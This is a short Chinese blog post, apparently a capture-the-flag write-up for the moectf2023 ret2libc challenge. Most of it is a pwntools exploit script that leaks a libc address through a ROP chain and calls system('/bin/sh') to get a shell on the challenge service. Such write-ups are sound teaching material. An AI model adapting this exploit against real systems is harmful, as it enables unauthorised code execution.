moectf2023 - ret2libc - RocketDevlog

标题: moectf2023 - ret2libc
作者: RocketDev
创建于: 2023-09-24 12:00:00
更新于: 2024-07-25 12:34:56
链接: https://rocketmadev.github.io/2023/09/24/ret2libc/
版权声明: 本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0 进行许可。

文件分析

下载pwn, NX on, PIE off, Canary off, RELRO partial
ghidra分析为64位程序

解题思路

vuln函数里就写了利用ret2libc...和之前一样

EXPLOIT

import LibcSearcher
from pwn import *
sh = remote('localhost', 39671)
elf = ELF('ret2libc')

putsPlt = elf.plt['puts']
putsGot = elf.got['puts']
popRdiAddr = 0x40117e
vulnAddr = elf.symbols['vuln']

# payload 1
sh.sendline(b'0'*0x58 + p64(popRdiAddr) + p64(putsGot) + p64(putsPlt) + p64(vulnAddr))

sh.recvuntil(b'??\n\n') # skip
data = sh.recv()
putsGotAddr = u64(data[:6] + b'\0\0')
libc = LibcSearcher.LibcSearcher('puts', putsGotAddr & 0xfff)
libcBase = putsGotAddr - libc.dump('puts')
shstrAddr = libcBase + libc.dump('str_bin_sh')
systemAddr = libcBase + libc.dump('system')
retAddr = 0x40122a

# payload 2
sh.sendline(b'0'*0x58 + p64(popRdiAddr) + p64(shstrAddr) + p64(retAddr) + p64(systemAddr))

sh.interactive()

Done.